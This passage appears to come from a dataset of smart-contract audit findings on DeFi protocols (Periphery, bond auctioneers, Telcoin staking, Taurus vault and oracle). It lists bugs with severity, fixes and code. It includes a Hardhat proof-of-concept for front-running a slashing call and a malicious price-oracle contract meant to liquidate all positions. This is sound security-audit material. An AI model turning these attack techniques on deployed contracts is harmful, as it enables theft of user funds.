address(this).balance : quote.buyToken.balanceOf(address(this));\\n```\\n +sponsorSeries() method fails when user want to swap for stake token using,medium,"`sponsorSeries()` fails when user want to use `swapQuote` to swap for stake token to sponsor a series.\\nstake is token that user need to deposit (technically is pulled) to be able to sponsor a series for a given target. User has option to send `SwapQuote calldata quote` and swap any ERC20 token for stake token. Below is the code that doing transferFrom() of stakeToken not sellToken()\\n```\\nif (address(quote.sellToken) != ETH) _transferFrom(permit, stake, stakeSize);\\n if (address(quote.sellToken) != stake) _fillQuote(quote);\\n```\\n\\nExpected behaviour of this function is to pull `sellToken` from msg.sender when `address(quote.sellToken) != stake`. For example- stake token is WETH. User want to swap DAI for WETH in `sponsorSeries()`. In this case, user would be sending SwapQuote.sellToken = DAI and swapQuote.buyToke = WETH and expect that fillQuote() would swap it for WETH. This method will fail because `sellToken` not transferred from msg.sender.",Consider implementation of functionality to transferFrom `sellToken` from msg.sender with actual amount that is require to get exact amountOut greater or equal to `stakeSize`,sponsorSeries() fails when `address(quote.sellToken) != stake`,"```\\nif (address(quote.sellToken) != ETH) _transferFrom(permit, stake, stakeSize);\\n if (address(quote.sellToken) != stake) _fillQuote(quote);\\n```\\n" +Periphery#_swapPTsForTarget won't work correctly if PT is mature but redeem is restricted,medium,"Periphery#_swapPTsForTarget doesn't properly account for mature PTs that have their redemption restricted\\nPeriphery.sol#L531-L551\\n```\\nfunction _swapPTsForTarget(\\n address adapter,\\n uint256 maturity,\\n uint256 ptBal,\\n PermitData calldata permit\\n) internal returns (uint256 tBal) {\\n _transferFrom(permit, divider.pt(adapter, maturity), ptBal);\\n\\n if (divider.mscale(adapter, maturity) > 0) {\\n tBal = divider.redeem(adapter, maturity, ptBal); <- @audit-issue always tries to redeem even if restricted\\n } else {\\n tBal = _balancerSwap(\\n divider.pt(adapter, maturity),\\n Adapter(adapter).target(),\\n ptBal,\\n BalancerPool(spaceFactory.pools(adapter, maturity)).getPoolId(),\\n 0,\\n payable(address(this))\\n );\\n }\\n}\\n```\\n\\nAdapters can have their redeem restricted meaning the even when they are mature they can't be redeemed. In the scenario that it is restricted Periphery#_swapPTsForTarget simply won't work.","Use the same structure as _removeLiquidity:\\n```\\n if (divider.mscale(adapter, maturity) > 0) {\\n if (uint256(Adapter(adapter).level()).redeemRestricted()) {\\n ptBal = _ptBal;\\n } else {\\n // 2. Redeem PTs for Target\\n tBal += divider.redeem(adapter, maturity, _ptBal);\\n }\\n```\\n",Redemption will fail when redeem is restricted because it tries to redeem instead of swapping,"```\\nfunction _swapPTsForTarget(\\n address adapter,\\n uint256 maturity,\\n uint256 ptBal,\\n PermitData calldata permit\\n) internal returns (uint256 tBal) {\\n _transferFrom(permit, divider.pt(adapter, maturity), ptBal);\\n\\n if (divider.mscale(adapter, maturity) > 0) {\\n tBal = divider.redeem(adapter, maturity, ptBal); <- @audit-issue always tries to redeem even if restricted\\n } else {\\n tBal = _balancerSwap(\\n divider.pt(adapter, maturity),\\n Adapter(adapter).target(),\\n ptBal,\\n BalancerPool(spaceFactory.pools(adapter, maturity)).getPoolId(),\\n 0,\\n payable(address(this))\\n );\\n }\\n}\\n```\\n" +The createMarket transaction lack of expiration timestamp check,medium,"The createMarket transaction lack of expiration timestamp check\\nLet us look into the heavily forked Uniswap V2 contract addLiquidity function implementation\\n```\\n// **** ADD LIQUIDITY ****\\nfunction _addLiquidity(\\n address tokenA,\\n address tokenB,\\n uint amountADesired,\\n uint amountBDesired,\\n uint amountAMin,\\n uint amountBMin\\n) internal virtual returns (uint amountA, uint amountB) {\\n // create the pair if it doesn't exist yet\\n if (IUniswapV2Factory(factory).getPair(tokenA, tokenB) == address(0)) {\\n IUniswapV2Factory(factory).createPair(tokenA, tokenB);\\n }\\n (uint reserveA, uint reserveB) = UniswapV2Library.getReserves(factory, tokenA, tokenB);\\n if (reserveA == 0 && reserveB == 0) {\\n (amountA, amountB) = (amountADesired, amountBDesired);\\n } else {\\n uint amountBOptimal = UniswapV2Library.quote(amountADesired, reserveA, reserveB);\\n if (amountBOptimal <= amountBDesired) {\\n require(amountBOptimal >= amountBMin, 'UniswapV2Router: INSUFFICIENT_B_AMOUNT');\\n (amountA, amountB) = (amountADesired, amountBOptimal);\\n } else {\\n uint amountAOptimal = UniswapV2Library.quote(amountBDesired, reserveB, reserveA);\\n assert(amountAOptimal <= amountADesired);\\n require(amountAOptimal >= amountAMin, 'UniswapV2Router: INSUFFICIENT_A_AMOUNT');\\n (amountA, amountB) = (amountAOptimal, amountBDesired);\\n }\\n }\\n}\\n\\nfunction addLiquidity(\\n address tokenA,\\n address tokenB,\\n uint amountADesired,\\n uint amountBDesired,\\n uint amountAMin,\\n uint amountBMin,\\n address to,\\n uint deadline\\n) external virtual override ensure(deadline) returns (uint amountA, uint amountB, uint liquidity) {\\n (amountA, amountB) = _addLiquidity(tokenA, tokenB, amountADesired, amountBDesired, amountAMin, amountBMin);\\n address pair = UniswapV2Library.pairFor(factory, tokenA, tokenB);\\n TransferHelper.safeTransferFrom(tokenA, msg.sender, pair, amountA);\\n TransferHelper.safeTransferFrom(tokenB, msg.sender, pair, amountB);\\n liquidity = IUniswapV2Pair(pair).mint(to);\\n}\\n```\\n\\nthe implementation has two point that worth noting,\\nthe first point is the deadline check\\n```\\nmodifier ensure(uint deadline) {\\n require(deadline >= block.timestamp, 'UniswapV2Router: EXPIRED');\\n _;\\n}\\n```\\n\\nThe transaction can be pending in mempool for a long time and can be executed in a long time after the user submit the transaction.\\nProblem is createMarket, which calculates the length and maxPayout by block.timestamp inside it.\\n```\\n // Calculate market length and check time bounds\\n uint48 length = uint48(params_.conclusion - block.timestamp); \\\\n if (\\n length < minMarketDuration ||\\n params_.depositInterval < minDepositInterval ||\\n params_.depositInterval > length\\n ) revert Auctioneer_InvalidParams();\\n\\n // Calculate the maximum payout amount for this market, determined by deposit interval\\n uint256 capacity = params_.capacityInQuote\\n ? params_.capacity.mulDiv(scale, price)\\n : params_.capacity;\\n market.maxPayout = capacity.mulDiv(uint256(params_.depositInterval), uint256(length));\\n```\\n\\nAfter the market is created at wrong time, user can call purchase. At purchaseBond(),\\n```\\n // Payout for the deposit = amount / price\\n //\\n // where:\\n // payout = payout tokens out\\n // amount = quote tokens in\\n // price = quote tokens : payout token (i.e. 200 QUOTE : BASE), adjusted for scaling\\n payout = amount_.mulDiv(term.scale, price);\\n\\n // Payout must be greater than user inputted minimum\\n if (payout < minAmountOut_) revert Auctioneer_AmountLessThanMinimum();\\n\\n // Markets have a max payout amount, capping size because deposits\\n // do not experience slippage. max payout is recalculated upon tuning\\n if (payout > market.maxPayout) revert Auctioneer_MaxPayoutExceeded();\\n```\\n\\npayout value is calculated by term.scale which the market owner has set assuming the market would be created at desired timestamp. Even, maxPayout is far bigger than expected, as it is calculated by very small length.","Use deadline, like uniswap","Even though the market owner close the market at any time, malicious user can attack the market before close and steal unexpectedly large amount of payout Tokens.","```\\n// **** ADD LIQUIDITY ****\\nfunction _addLiquidity(\\n address tokenA,\\n address tokenB,\\n uint amountADesired,\\n uint amountBDesired,\\n uint amountAMin,\\n uint amountBMin\\n) internal virtual returns (uint amountA, uint amountB) {\\n // create the pair if it doesn't exist yet\\n if (IUniswapV2Factory(factory).getPair(tokenA, tokenB) == address(0)) {\\n IUniswapV2Factory(factory).createPair(tokenA, tokenB);\\n }\\n (uint reserveA, uint reserveB) = UniswapV2Library.getReserves(factory, tokenA, tokenB);\\n if (reserveA == 0 && reserveB == 0) {\\n (amountA, amountB) = (amountADesired, amountBDesired);\\n } else {\\n uint amountBOptimal = UniswapV2Library.quote(amountADesired, reserveA, reserveB);\\n if (amountBOptimal <= amountBDesired) {\\n require(amountBOptimal >= amountBMin, 'UniswapV2Router: INSUFFICIENT_B_AMOUNT');\\n (amountA, amountB) = (amountADesired, amountBOptimal);\\n } else {\\n uint amountAOptimal = UniswapV2Library.quote(amountBDesired, reserveB, reserveA);\\n assert(amountAOptimal <= amountADesired);\\n require(amountAOptimal >= amountAMin, 'UniswapV2Router: INSUFFICIENT_A_AMOUNT');\\n (amountA, amountB) = (amountAOptimal, amountBDesired);\\n }\\n }\\n}\\n\\nfunction addLiquidity(\\n address tokenA,\\n address tokenB,\\n uint amountADesired,\\n uint amountBDesired,\\n uint amountAMin,\\n uint amountBMin,\\n address to,\\n uint deadline\\n) external virtual override ensure(deadline) returns (uint amountA, uint amountB, uint liquidity) {\\n (amountA, amountB) = _addLiquidity(tokenA, tokenB, amountADesired, amountBDesired, amountAMin, amountBMin);\\n address pair = UniswapV2Library.pairFor(factory, tokenA, tokenB);\\n TransferHelper.safeTransferFrom(tokenA, msg.sender, pair, amountA);\\n TransferHelper.safeTransferFrom(tokenB, msg.sender, pair, amountB);\\n liquidity = IUniswapV2Pair(pair).mint(to);\\n}\\n```\\n" +"""Equilibrium price"" is not used to compute the capacity (OSDA Only)",medium,"""Equilibrium price"" is not used to compute the capacity leading to a smaller-than-expected max payout.\\nIn OFDA, it was observed that if the capacity is denominated in the quote token, the capacity will be calculated with the discounted price.\\n```\\nFile: BondBaseOFDA.sol\\n function _createMarket(MarketParams memory params_) internal returns (uint256) {\\n..SNIP..\\n // Calculate the maximum payout amount for this market\\n uint256 capacity = params_.capacityInQuote\\n ? params_.capacity.mulDiv(\\n scale,\\n price.mulDivUp(\\n uint256(ONE_HUNDRED_PERCENT - params_.fixedDiscount),\\n uint256(ONE_HUNDRED_PERCENT)\\n )\\n )\\n : params_.capacity;\\n market.maxPayout = capacity.mulDiv(uint256(params_.depositInterval), uint256(length));\\n```\\n\\nHowever, in OSDA, if the capacity is denominated in the quote token, the capacity will be calculated with the oracle price instead of the discounted price.\\n```\\nFile: BondBaseOSDA.sol\\n function _createMarket(MarketParams memory params_) internal returns (uint256) {\\n..SNIP..\\n // Calculate the maximum payout amount for this market, determined by deposit interval\\n uint256 capacity = params_.capacityInQuote\\n ? params_.capacity.mulDiv(scale, price)\\n : params_.capacity;\\n market.maxPayout = capacity.mulDiv(uint256(params_.depositInterval), uint256(length));\\n```\\n\\nIn OSDA, it was also observed that the base discount is applied to the oracle price while calculating the price decimals because this will be the initial equilibrium price of the market. However, this ""initial equilibrium price"" is not used earlier when computing the capacity.\\n```\\nFile: BondBaseOSDA.sol\\n function _validateOracle(\\n uint256 id_,\\n IBondOracle oracle_,\\n ERC20 quoteToken_,\\n ERC20 payoutToken_,\\n uint48 baseDiscount_\\n )\\n..SNIP..\\n // Get the price decimals for the current oracle price\\n // Oracle price is in quote tokens per payout token\\n // E.g. if quote token is $10 and payout token is $2000,\\n // then the oracle price is 200 quote tokens per payout token.\\n // If the oracle has 18 decimals, then it would return 200 * 10^18.\\n // In this case, the price decimals would be 2 since 200 = 2 * 10^2.\\n // We apply the base discount to the oracle price before calculating\\n // since this will be the initial equilibrium price of the market.\\n int8 priceDecimals = _getPriceDecimals(\\n currentPrice.mulDivUp(\\n uint256(ONE_HUNDRED_PERCENT - baseDiscount_),\\n uint256(ONE_HUNDRED_PERCENT)\\n ),\\n oracleDecimals\\n );\\n```\\n","Applied the discount to obtain the ""equilibrium price"" before computing the capacity.\\n```\\n// Calculate the maximum payout amount for this market, determined by deposit interval\\nuint256 capacity = params_.capacityInQuote\\n// Remove the line below\\n ? params_.capacity.mulDiv(scale, price)\\n// Add the line below\\n ? params_.capacity.mulDiv(scale, price.mulDivUp(\\n// Add the line below\\n uint256(ONE_HUNDRED_PERCENT // Remove the line below\\n params_.baseDiscount),\\n// Add the line below\\n uint256(ONE_HUNDRED_PERCENT)\\n// Add the line below\\n )\\n// Add the line below\\n )\\n : params_.capacity;\\nmarket.maxPayout = capacity.mulDiv(uint256(params_.depositInterval), uint256(length));\\n```\\n","As the discount is not applied to the price when computing the capacity, the price will be higher which leads to a smaller capacity. A smaller capacity will in turn result in a smaller max payout. A smaller-than-expected max payout reduces the maximum number of payout tokens a user can purchase at any single point in time, which might reduce the efficiency of a Bond market.\\nUsers who want to purchase a large number of bond tokens have to break their trade into smaller chunks to overcome the smaller-than-expected max payout, leading to unnecessary delay and additional gas fees.","```\\nFile: BondBaseOFDA.sol\\n function _createMarket(MarketParams memory params_) internal returns (uint256) {\\n..SNIP..\\n // Calculate the maximum payout amount for this market\\n uint256 capacity = params_.capacityInQuote\\n ? params_.capacity.mulDiv(\\n scale,\\n price.mulDivUp(\\n uint256(ONE_HUNDRED_PERCENT - params_.fixedDiscount),\\n uint256(ONE_HUNDRED_PERCENT)\\n )\\n )\\n : params_.capacity;\\n market.maxPayout = capacity.mulDiv(uint256(params_.depositInterval), uint256(length));\\n```\\n" +"`slash` calls can be blocked, allowing malicious users to bypass the slashing mechanism.",medium,"A malicious user can block slashing by frontrunning `slash` with a call to `stake(1)` at the same block, allowing him to keep blocking calls to `slash` while waiting for his withdraw delay, effectively bypassing the slashing mechanism.\\nStakingModule's `checkpointProtection` modifier reverts certain actions, like claims, if the accounts' stake was previously modified in the same block. A malicious user can exploit this to intentionally block calls to `slash`.\\nConsider the following scenario, where Alice has `SLASHER_ROLE` and Bob is the malicious user.\\nAlice calls `slash` on Bob's account.\\nBob sees the transaction on the mempool and tries to frontrun it by staking 1 TEL. (See Proof of Concept section below for a simplified example of this scenario)\\nIf Bob stake call is processed first (he can pay more gas to increase his odds of being placed before than Alice), his new stake is pushed to `_stakes[address(Bob)]`, and his latest checkpoint (_stakes[address(Bob)]._checkpoints[numCheckpoints - 1]) `blockNumber` field is updated to the current `block.number`. So when `slash` is being processed in the same block and calls internally `_claimAndExit` it will revert due to the `checkpointProtection` modifier check (See code snippet below).\\n```\\nmodifier checkpointProtection(address account) {\\n uint256 numCheckpoints = _stakes[account]._checkpoints.length;\\n require(numCheckpoints == 0 || _stakes[account]._checkpoints[numCheckpoints - 1]._blockNumber != block.number, ""StakingModule: Cannot exit in the same block as another stake or exit"");\\n _;\\n}\\n```\\n\\nBob can do this indefinitely, eventually becoming a gas war between Alice and Bob or until Alice tries to use Flashbots Protect or similar services to avoid the public mempool. More importantly, this can be leverage to block all `slash` attempts while waiting the time required to withdraw, so the malicious user could call `requestWithdrawal()`, then keep blocking all future `slash` calls while waiting for his `withdrawalDelay`, then proceed to withdraws his stake when `block.timestamp > withdrawalRequestTimestamps[msg.sender] + withdrawalDelay`. Therefore bypassing the slashing mechanism.\\nIn this modified scenario\\nAlice calls `slash` on Bob's account.\\nBob sees the transaction on the mempool and tries to frontrun it by staking 1 TEL.\\nBob requests his withdraw (requestWithdrawal())\\nBob keeps monitoring the mempool for future calls to `slash` against his account, trying to frontrun each one of them.\\nWhen enough time has passed so that his withdraw is available, Bob calls `exit` or `fullClaimAndExit`","Consider implementing a specific version of `_claimAndExit` without the `checkpointProtection` modifier, to be used inside the `slash` function.","Slashing calls can be blocked by malicious user, allowing him to request his withdraw, wait until withdraw delay has passed (while blocking further calls to slash) and then withdraw his funds.\\nClassify this one as medium severity, because even though there are ways to avoid being frontrunned, like paying much more gas or using services like Flashbots Protect, none is certain to work because the malicious user can use the same methods to their advantage. And if the malicious user is successful, this would result in loss of funds to the protocol (i.e funds that should have been slashed, but user managed to withdraw them)\\nProof of Concept\\nThe POC below shows that staking prevents any future call to `slash` on the same block. To reproduce this POC just copy the code to a file on the test/ folder and run it.\\n```\\nconst { expect } = require(""chai"")\\nconst { ethers, upgrades } = require(""hardhat"")\\n\\nconst emptyBytes = []\\n\\ndescribe(""POC"", () => {\\n let deployer\\n let alice\\n let bob\\n let telContract\\n let stakingContract\\n let SLASHER_ROLE\\n\\n beforeEach(""setup"", async () => {\\n [deployer, alice, bob] = await ethers.getSigners()\\n\\n //Deployments\\n const TELFactory = await ethers.getContractFactory(""TestTelcoin"", deployer)\\n const StakingModuleFactory = await ethers.getContractFactory(\\n ""StakingModule"",\\n deployer\\n )\\n telContract = await TELFactory.deploy(deployer.address)\\n await telContract.deployed()\\n stakingContract = await upgrades.deployProxy(StakingModuleFactory, [\\n telContract.address,\\n 3600,\\n 10\\n ])\\n\\n //Grant SLASHER_ROLE to Alice\\n SLASHER_ROLE = await stakingContract.SLASHER_ROLE()\\n await stakingContract\\n .connect(deployer)\\n .grantRole(SLASHER_ROLE, alice.address)\\n\\n //Send some TEL tokens to Bob\\n await telContract.connect(deployer).transfer(bob.address, 1)\\n\\n //Setup approvals\\n await telContract\\n .connect(bob)\\n .approve(stakingContract.address, 1)\\n })\\n\\n describe(""POC"", () => {\\n it(""should revert during slash"", async () => {\\n //Disable auto-mining and set interval to 0 necessary to guarantee both transactions\\n //below are mined in the same block, reproducing the frontrunning scenario.\\n await network.provider.send(""evm_setAutomine"", [false]);\\n await network.provider.send(""evm_setIntervalMining"", [0]);\\n\\n //Bob stakes 1 TEL\\n await stakingContract\\n .connect(bob)\\n .stake(1)\\n\\n //Turn on the auto-mining, so that after the next transaction is sent, the block is mined.\\n await network.provider.send(""evm_setAutomine"", [true]);\\n \\n //Alice tries to slash Bob, but reverts.\\n await expect(stakingContract\\n .connect(alice)\\n .slash(bob.address, 1, stakingContract.address, emptyBytes)).to.be.revertedWith(\\n ""StakingModule: Cannot exit in the same block as another stake or exit""\\n )\\n })\\n })\\n})\\n```\\n","```\\nmodifier checkpointProtection(address account) {\\n uint256 numCheckpoints = _stakes[account]._checkpoints.length;\\n require(numCheckpoints == 0 || _stakes[account]._checkpoints[numCheckpoints - 1]._blockNumber != block.number, ""StakingModule: Cannot exit in the same block as another stake or exit"");\\n _;\\n}\\n```\\n" +FeeBuyback.submit() method may fail if all allowance is not used by referral contract,medium,"Inside `submit()` method of `FeeBuyback.sol`, if token is `_telcoin` then it safeApprove to `_referral` contract. If `_referral` contract do not use all allowance then `submit()` method will fail in next call.\\n`SafeApprove()` method of library `SafeERC20Upgradeable` revert in following scenario.\\n```\\nrequire((value == 0) || (token.allowance(address(this), spender) == 0), \\n""SafeERC20: approve from non-zero to non-zero allowance"");\\n```\\n\\nSubmit method is doing `safeApproval` of Telcoin to referral contract. If referral contract do not use full allowance then subsequent call to `submit()` method will fails because of `SafeERC20: approve from non-zero to non-zero allowance`. `FeeBuyback` contract should not trust or assume that referral contract will use all allowance. If it does not use all allowance in `increaseClaimableBy()` method then `submit()` method will revert in next call. This vulnerability exists at two places in `submit()` method. Link given in code snippet section.","Reset allowance to 0 before non-zero approval.\\n```\\n_telcoin.safeApprove(address(_referral), 0);\\n_telcoin.safeApprove(address(_referral), _telcoin.balanceOf(address(this)));\\n```\\n",Submit() call will fail until referral contract do not use all allowance.,"```\\nrequire((value == 0) || (token.allowance(address(this), spender) == 0), \\n""SafeERC20: approve from non-zero to non-zero allowance"");\\n```\\n" +Missing input validation for _rewardProportion parameter allows keeper to escalate his privileges and pay back all loans,high,"They are also able to choose how much yield token to swap and what the proportion of the resulting TAU is that is distributed to users vs. not distributed in order to erase bad debt.\\nSo a `keeper` is not trusted to perform any actions that go beyond swapping yield / performing liquidations.\\nHowever there is a missing input validation for the `_rewardProportion` parameter in the `SwapHandler.swapForTau` function. This allows a keeper to ""erase"" all debt of users. So users can withdraw their collateral without paying any of the debt.\\nBy looking at the code we can see that `_rewardProportion` is used to determine the amount of `TAU` that `_withholdTau` is called with: Link\\n```\\n_withholdTau((tauReturned * _rewardProportion) / Constants.PERCENT_PRECISION);\\n```\\n\\nAny value of `_rewardProportion` greater than `1e18` means that more `TAU` will be distributed to users than has been burnt (aka erasing debt).\\nIt is easy to see how the `keeper` can chose the number so big that `_withholdTau` is called with a value close to `type(uint256).max` which will certainly be enough to erase all debt.","I discussed this issue with the sponsor and it is intended that the `keeper` role can freely chose the value of the `_rewardProportion` parameter within the `[0,1e18]` range, i.e. 0%-100%.\\nTherefore the fix is to simply check that `_rewardProportion` is not bigger than 1e18:\\n```\\ndiff --git a/taurus-contracts/contracts/Vault/SwapHandler.sol b/taurus-contracts/contracts/Vault/SwapHandler.sol\\nindex c04e3a4..ab5064b 100644\\n--- a/taurus-contracts/contracts/Vault/SwapHandler.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/taurus-contracts/contracts/Vault/SwapHandler.sol\\n@@ -59,6 // Add the line below\\n59,10 @@ abstract contract SwapHandler is FeeMapping, TauDripFeed {\\n revert zeroAmount();\\n }\\n \\n// Add the line below\\n if (_rewardProportion > Constants.PERCENT_PRECISION) [\\n// Add the line below\\n revert invalidRewardProportion();\\n// Add the line below\\n ]\\n// Add the line below\\n\\n // Get and validate swap adapter address\\n address swapAdapterAddress = SwapAdapterRegistry(controller).swapAdapters(_swapAdapterHash);\\n if (swapAdapterAddress == address(0)) {\\n```\\n",A `keeper` can escalate his privileges and erase all debt. This means that `TAU` will not be backed by any collateral anymore and will be worthless.,```\\n_withholdTau((tauReturned * _rewardProportion) / Constants.PERCENT_PRECISION);\\n```\\n +`swap()` will be reverted if `path` has more tokens.,medium,"`swap()` will be reverted if `path` has more tokens, the keepers will not be able to successfully call `swapForTau()`.\\nIn test/SwapAdapters/00_UniswapSwapAdapter.ts:\\n```\\n // Get generic swap parameters\\n const basicSwapParams = buildUniswapSwapAdapterData(\\n [""0xyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy"", ""0xzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz""],\\n [3000],\\n testDepositAmount,\\n expectedReturnAmount,\\n 0,\\n ).swapData;\\n```\\n\\nWe will get:\\n```\\n000000000000000000000000000000000000000000000000000000024f49cbca\\n0000000000000000000000000000000000000000000000056bc75e2d63100000\\n0000000000000000000000000000000000000000000000055de6a779bbac0000\\n0000000000000000000000000000000000000000000000000000000000000080\\n000000000000000000000000000000000000000000000000000000000000002b\\nyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy000bb8zzzzzzzzzzzzzzzzzz\\nzzzzzzzzzzzzzzzzzzzzzz000000000000000000000000000000000000000000\\n```\\n\\nThen the `swapOutputToken` is `_swapData[length - 41:length - 21]`.\\nBut if we have more tokens in path:\\n```\\n const basicSwapParams = buildUniswapSwapAdapterData(\\n [""0xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"", ""0xyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy"", ""0xzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz""],\\n [3000, 3000],\\n testDepositAmount,\\n expectedReturnAmount,\\n 0,\\n ).swapData;\\n```\\n\\n```\\n000000000000000000000000000000000000000000000000000000024f49cbca\\n0000000000000000000000000000000000000000000000056bc75e2d63100000\\n0000000000000000000000000000000000000000000000055de6a779bbac0000\\n0000000000000000000000000000000000000000000000000000000000000080\\n0000000000000000000000000000000000000000000000000000000000000042\\nxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx000bb8yyyyyyyyyyyyyyyyyy\\nyyyyyyyyyyyyyyyyyyyyyy000bb8zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz\\nzzzz000000000000000000000000000000000000000000000000000000000000\\n```\\n\\n`swapOutputToken` is `_swapData[length - 50:length - 30]`, the `swap()` function will be reverted.","Limit the swap pools, or check if the balance of `_outputToken` should exceed `_amountOutMinimum`.",The keepers will not be able to successfully call `SwapHandler.swapForTau()`. Someone will get a reverted transaction if they misuse `UniswapSwapAdapter`.,"```\\n // Get generic swap parameters\\n const basicSwapParams = buildUniswapSwapAdapterData(\\n [""0xyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy"", ""0xzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz""],\\n [3000],\\n testDepositAmount,\\n expectedReturnAmount,\\n 0,\\n ).swapData;\\n```\\n" +Mint limit is not reduced when the Vault is burning TAU,medium,"Upon burning TAU, it incorrectly updates the `currentMinted` when Vault is acting on behalf of users.\\nWhen the burn of `TAU` is performed, it calls `_decreaseCurrentMinted` to reduce the limit of tokens minted by the Vault:\\n```\\n function _decreaseCurrentMinted(address account, uint256 amount) internal virtual {\\n // If the burner is a vault, subtract burnt TAU from its currentMinted.\\n // This has a few highly unimportant edge cases which can generally be rectified by increasing the relevant vault's mintLimit.\\n uint256 accountMinted = currentMinted[account];\\n if (accountMinted >= amount) {\\n currentMinted[msg.sender] = accountMinted - amount;\\n }\\n }\\n```\\n\\nThe issue is that it subtracts `accountMinted` (which is currentMinted[account]) from `currentMinted[msg.sender]`. When the vault is burning tokens on behalf of the user, the `account` != `msg.sender` meaning the `currentMinted[account]` is 0, and thus the `currentMinted` of Vault will be reduced by 0 making it pretty useless.\\nAnother issue is that users can transfer their `TAU` between accounts, and then `amount > accountMinted` will not be triggered.",A simple solution would be to:\\n```\\n uint256 accountMinted = currentMinted[msg.sender];\\n```\\n\\nBut I suggest revisiting and rethinking this function altogether.,`currentMinted` is incorrectly decreased upon burning so vaults do not get more space to mint new tokens.,"```\\n function _decreaseCurrentMinted(address account, uint256 amount) internal virtual {\\n // If the burner is a vault, subtract burnt TAU from its currentMinted.\\n // This has a few highly unimportant edge cases which can generally be rectified by increasing the relevant vault's mintLimit.\\n uint256 accountMinted = currentMinted[account];\\n if (accountMinted >= amount) {\\n currentMinted[msg.sender] = accountMinted - amount;\\n }\\n }\\n```\\n" +Account can not be liquidated when price fall by 99%.,medium,"Liquidation fails when price fall by 99%.\\n`_calcLiquidation()` method has logic related to liquidations. This method calculate total liquidation discount, collateral to liquidate and liquidation surcharge. All these calculations looks okay in normal scenarios but there is an edge case when liquidation fails if price crashes by 99% or more. In such scenario `collateralToLiquidateWithoutDiscount` will be very large and calculated liquidation surcharge becomes greater than `collateralToLiquidate`\\n```\\nuint256 collateralToLiquidateWithoutDiscount = (_debtToLiquidate * (10 ** decimals)) / price;\\ncollateralToLiquidate = (collateralToLiquidateWithoutDiscount * totalLiquidationDiscount) / Constants.PRECISION;\\nif (collateralToLiquidate > _accountCollateral) {\\n collateralToLiquidate = _accountCollateral;\\n}\\nuint256 liquidationSurcharge = (collateralToLiquidateWithoutDiscount * LIQUIDATION_SURCHARGE) / Constants.PRECISION\\n```\\n\\nContract revert from below line hence liquidation will fail in this scenario.\\n```\\nuint256 collateralToLiquidator = collateralToLiquidate - liquidationSurcharge;\\n```\\n","Presently liquidation surcharge is calculated on `collateralToLiquidateWithoutDiscount`. Project team may want to reconsider this logic and calculate surcharge on `collateralToLiquidate` instead of `collateralToLiquidateWithoutDiscount`. This will be business decision but easy fix\\nAnother option is you may want to calculate surcharge on `Math.min(collateralToLiquidate, collateralToLiquidateWithoutDiscount)`.\\n```\\n uint256 collateralToTakeSurchargeOn = Math.min(collateralToLiquidate, collateralToLiquidateWithoutDiscount);\\n uint256 liquidationSurcharge = (collateralToTakeSurchargeOn * LIQUIDATION_SURCHARGE) / Constants.PRECISION;\\n return (collateralToLiquidate, liquidationSurcharge);\\n```\\n",Liquidation fails when price crash by 99% or more. Expected behaviour is that liquidation should be successful in all scenarios.,```\\nuint256 collateralToLiquidateWithoutDiscount = (_debtToLiquidate * (10 ** decimals)) / price;\\ncollateralToLiquidate = (collateralToLiquidateWithoutDiscount * totalLiquidationDiscount) / Constants.PRECISION;\\nif (collateralToLiquidate > _accountCollateral) {\\n collateralToLiquidate = _accountCollateral;\\n}\\nuint256 liquidationSurcharge = (collateralToLiquidateWithoutDiscount * LIQUIDATION_SURCHARGE) / Constants.PRECISION\\n```\\n +Protocol is will not work on most of the supported blockchains due to hardcoded WETH contract address.,medium,"The WETH address is hardcoded in the `Swap` library.\\nAs stated in the README.md, the protocol will be deployed on the following EVM blockchains - Ethereum Mainnet, Arbitrum, Optimism, Polygon, Binance Smart Chain. While the project has integration tests with an ethereum mainnet RPC, they don't catch that on different chains like for example Polygon saveral functionallities will not actually work because of the hardcoded WETH address in the Swap.sol library:\\n```\\naddress internal constant WETH = 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2;\\n```\\n",The WETH variable should be immutable in the Vault contract instead of a constant in the Swap library and the Wrapped Native Token contract address should be passed in the Vault constructor on each separate deployment.,Protocol will not work on most of the supported blockchains.,```\\naddress internal constant WETH = 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2;\\n```\\n +A malicious admin can steal all users collateral,medium,"According to Taurus contest details, all roles, including the admin `Multisig`, should not be able to drain users collateral.\\n```\\n2. Multisig. Trusted with essentially everything but user collateral. \\n```\\n\\nAs shown of `updateWrapper()` function of `PriceOracleManager.sol`, the admin (onlyOwner) can update any price oracle `_wrapperAddress` for any `_underlying` collateral without any restrictions (such as timelock).\\n```\\nFile: taurus-contracts\\contracts\\Oracle\\PriceOracleManager.sol\\n function updateWrapper(address _underlying, address _wrapperAddress) external override onlyOwner {\\n if (!_wrapperAddress.isContract()) revert notContract();\\n if (wrapperAddressMap[_underlying] == address(0)) revert wrapperNotRegistered(_wrapperAddress);\\n\\n wrapperAddressMap[_underlying] = _wrapperAddress;\\n\\n emit WrapperUpdated(_underlying, _wrapperAddress);\\n }\\n```\\n\\nHence, admin can set a malicious price oracle like\\n```\\ncontract AttackOracleWrapper is IOracleWrapper, Ownable {\\n address public attacker;\\n IGLPManager public glpManager;\\n\\n constructor(address _attacker, address glp) {\\n attacker = _attacker;\\n glpManager = IGLPManager(glp);\\n }\\n\\n function getExternalPrice(\\n address _underlying,\\n bytes calldata _flags\\n ) external view returns (uint256 price, uint8 decimals, bool success) {\\n if (tx.origin == attacker) {\\n return (1, 18, true); // @audit a really low price resulting in the liquidation of all positions\\n } else {\\n uint256 price = glpManager.getPrice();\\n return (price, 18, true);\\n }\\n }\\n}\\n```\\n\\nThen call `liquidate()` to drain out users collateral with negligible $TAU cost.\\n```\\nFile: taurus-contracts\\contracts\\Vault\\BaseVault.sol\\n function liquidate(\\n address _account,\\n uint256 _debtAmount,\\n uint256 _minExchangeRate\\n ) 